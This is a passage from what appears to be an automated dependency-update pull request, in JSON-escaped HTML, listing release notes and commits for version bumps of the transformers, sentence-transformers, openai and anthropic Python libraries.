href=\"https://redirect.github.com/huggingface/transformers/issues/46378\"\u003e#46378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/74464e8c49c91b574c30cc3cb3c5a44000237299\"\u003e\u003ccode\u003e74464e8\u003c/code\u003e\u003c/a\u003e Fix wrong changes produced by style/repo. check bot (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46371\"\u003e#46371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1b8ec344fb6c277235fc76c37e7a5c156a1f0ddc\"\u003e\u003ccode\u003e1b8ec34\u003c/code\u003e\u003c/a\u003e Fix path traversal when saving Bark voice preset embeddings (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46237\"\u003e#46237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/e820678256f22e7647e39e8b7ed040fa81b7b872\"\u003e\u003ccode\u003ee820678\u003c/code\u003e\u003c/a\u003e Add Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/595721c44cb14db37fa504903e2edd5e9f0eba43\"\u003e\u003ccode\u003e595721c\u003c/code\u003e\u003c/a\u003e Pass library_name/version to Hub calls via a shared HfApi (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46318\"\u003e#46318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.7.0...v5.10.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sentence-transformers` from 5.4.1 to 5.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/sentence-transformers/releases\"\u003esentence-transformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.1 - Small Multimodal patch\u003c/h2\u003e\n\u003cp\u003eThis patch release fixes a small quirk with multimodal inference when using single-key multimodal inputs like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003e# Training + Inference\r\npip install sentence-transformers[train]==5.5.1\r\n\u003ch1\u003eInference only, use one of:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers==5.5.1\npip install sentence-transformers[onnx-gpu]==5.5.1\npip install sentence-transformers[onnx]==5.5.1\npip install sentence-transformers[openvino]==5.5.1\u003c/p\u003e\n\u003ch1\u003eMultimodal dependencies (optional):\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[image]==5.5.1\npip install sentence-transformers[audio]==5.5.1\npip install sentence-transformers[video]==5.5.1\u003c/p\u003e\n\u003ch1\u003eOr combine as needed:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[train,onnx,image]==5.5.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003ch2\u003eBug fixed\u003c/h2\u003e\n\u003cp\u003ePreviously, inference like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e or \u003ccode\u003emodel.encode([{\u0026quot;image\u0026quot;: ...}, ...])\u003c/code\u003e would be inferred as the \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e modality, which differed from the inferred modality of \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e for just \u003ccode\u003emodel.encode(my_image)\u003c/code\u003e or \u003ccode\u003emodel.encode([my_image, my_image_2, ...])\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis results in confusing errors if the model doesn't have a \u003ccode\u003emodality_config\u003c/code\u003e mapping for \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e in addition to \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, so now a single-key multimodal dict is collapsed to the bare modality (just \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e in this example).\u003c/p\u003e\n\u003cp\u003eThis affected this code:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e\r\nfrom sentence_transformers import SentenceTransformer\r\n\u003cp\u003emodel = SentenceTransformer('BAAI/BGE-VL-base', trust_remote_code=True)\nembedding = model.encode({\u0026quot;image\u0026quot;: \u0026quot;\u003ca href=\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;%7D\"\u003ehttps://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;}\u003c/a\u003e)\nprint(embedding.shape)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eWhich previously failed as the model only implements a path for \u003ccode\u003e\u0026quot;text\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, and \u003ccode\u003e(\u0026quot;image\u0026quot;, \u0026quot;text\u0026quot;)\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eAll Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Collapse single-key multimodal dicts to bare modality by \u003ca href=\"https://github.com/tomaarsen\"\u003e\u003ccode\u003e@​tomaarsen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\"\u003ehttps://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.0 - Training Agent Skill, EmbedDistillLoss, and ADRMSELoss\u003c/h2\u003e\n\u003cp\u003eThis release ships the \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill, adds two new training losses, and brings a long list of robustness and correctness fixes.\u003c/p\u003e\n\u003cp\u003eThe new \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill lets AI coding agents (Claude Code, Codex, Cursor, Gemini CLI, ...) drive end-to-end training and fine-tuning across all three model types. \u003ccode\u003eEmbedDistillLoss\u003c/code\u003e is a new embedding-level knowledge distillation loss for \u003ccode\u003eSentenceTransformer\u003c/code\u003e: it aligns a student model's embeddings with pre-computed teacher embeddings, an alternative to the score-based distillation provided by \u003ccode\u003eMarginMSELoss\u003c/code\u003e and \u003ccode\u003eDistillKLDivLoss\u003c/code\u003e. \u003ccode\u003eADRMSELoss\u003c/code\u003e is a new listwise learning-to-rank loss for \u003ccode\u003eCrossEncoder\u003c/code\u003e from the Rank-DistiLLM paper. \u003ccode\u003eencode()\u003c/code\u003e and \u003ccode\u003epredict()\u003c/code\u003e also gain a per-call \u003ccode\u003eprocessing_kwargs\u003c/code\u003e override, and more.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/ce3ec6d87f25b2d1cccb0a20f8fd495dad5c30fb\"\u003e\u003ccode\u003ece3ec6d\u003c/code\u003e\u003c/a\u003e Release v5.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/610a7c5ccfdfccc19933900feba0206f2e76bf59\"\u003e\u003ccode\u003e610a7c5\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003efix\u003c/code\u003e] Collapse single-key multimodal dicts to bare modality (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/f9f3269c7bd548555b7273a5378d52eeaa5d6286\"\u003e\u003ccode\u003ef9f3269\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into v5.5-release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/02dc21d77dfd22b5816fb5398877253100b89b43\"\u003e\u003ccode\u003e02dc21d\u003c/code\u003e\u003c/a\u003e Update index tip for v5.5.0 (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3774\"\u003e#3774\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/833828b3dae0cf9e6943ae01b9c9645f883daf3b\"\u003e\u003ccode\u003e833828b\u003c/code\u003e\u003c/a\u003e Release v5.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/98ac358861359fd275824732e5f658b2f4ca6c78\"\u003e\u003ccode\u003e98ac358\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Load models in float32 in the training examples \u0026amp; docs (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3773\"\u003e#3773\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/d8ee0410ba140f41aa2ac0735a97e1d690dd2df5\"\u003e\u003ccode\u003ed8ee041\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use modality-neutral terms (input, document) in loss docs \u0026amp; docstrin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/4c6850e444e5bcedfb026e9d674ae18c19ab5233\"\u003e\u003ccode\u003e4c6850e\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eexamples\u003c/code\u003e] Avoid LoggingHandler, silence httpx in examples (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3771\"\u003e#3771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/1418823d250763751ea95212dfb9ecaa919f5e92\"\u003e\u003ccode\u003e1418823\u003c/code\u003e\u003c/a\u003e docs: fix grammar in parallel-sentence-mining README (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3769\"\u003e#3769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/22a383d3644cfaa40038adb0b70a9320f7f73d36\"\u003e\u003ccode\u003e22a383d\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use direct class imports in examples \u0026amp; docs (drop `losses.MSELoss(.....\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.4.1...v5.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `openai` from 2.32.0 to 2.41.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/releases\"\u003eopenai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.41.0\u003c/h2\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.40.0\u003c/h2\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.39.0\u003c/h2\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.38.0\u003c/h2\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.37.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/blob/main/CHANGELOG.md\"\u003eopenai's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.37.0 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.36.0...v2.37.0\"\u003ev2.36.0...v2.37.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2d955a1ac69df0288b8072bbcd25905639e9b2ed\"\u003e\u003ccode\u003e2d955a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3359\"\u003e#3359\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/519cd027919fa5b73bd8fe237e80c7a01b3e0b2f\"\u003e\u003ccode\u003e519cd02\u003c/code\u003e\u003c/a\u003e release: 2.41.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e\u003ccode\u003e87e46c2\u003c/code\u003e\u003c/a\u003e feat(api): responses.moderation and chat_completions.moderation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a28a3f6aa34f5ac6fcc2fafeb50112f2140c45ae\"\u003e\u003ccode\u003ea28a3f6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3352\"\u003e#3352\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/db6ccafa7b74b72caefbda6fb63bd5c904521770\"\u003e\u003ccode\u003edb6ccaf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2264f700dad91e4f570eb7c0a6f10bbd22d34520\"\u003e\u003ccode\u003e2264f70\u003c/code\u003e\u003c/a\u003e release: 2.40.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e\u003ccode\u003e4d5bfde\u003c/code\u003e\u003c/a\u003e fix(api): allow setting bedrock api keys on the client directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/ccef1436d9f52b5014597047e450eef543a87540\"\u003e\u003ccode\u003eccef143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3326\"\u003e#3326\u003c/a\u003e from openai/codex/bedrock-responses-review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a50ff0a19084306a09012ff85f730ea2c129eef9\"\u003e\u003ccode\u003ea50ff0a\u003c/code\u003e\u003c/a\u003e Fix Bedrock with_options overrides\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/fdf4901e301fa01b368ede0b5b407dca42f07acc\"\u003e\u003ccode\u003efdf4901\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/openai/openai-python/compare/v2.32.0...v2.41.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `anthropic` from 0.96.0 to 0.107.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/releases\"\u003eanthropic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.107.0\u003c/h2\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.106.0\u003c/h2\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.105.2\u003c/h2\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.105.1\u003c/h2\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e use Trusted 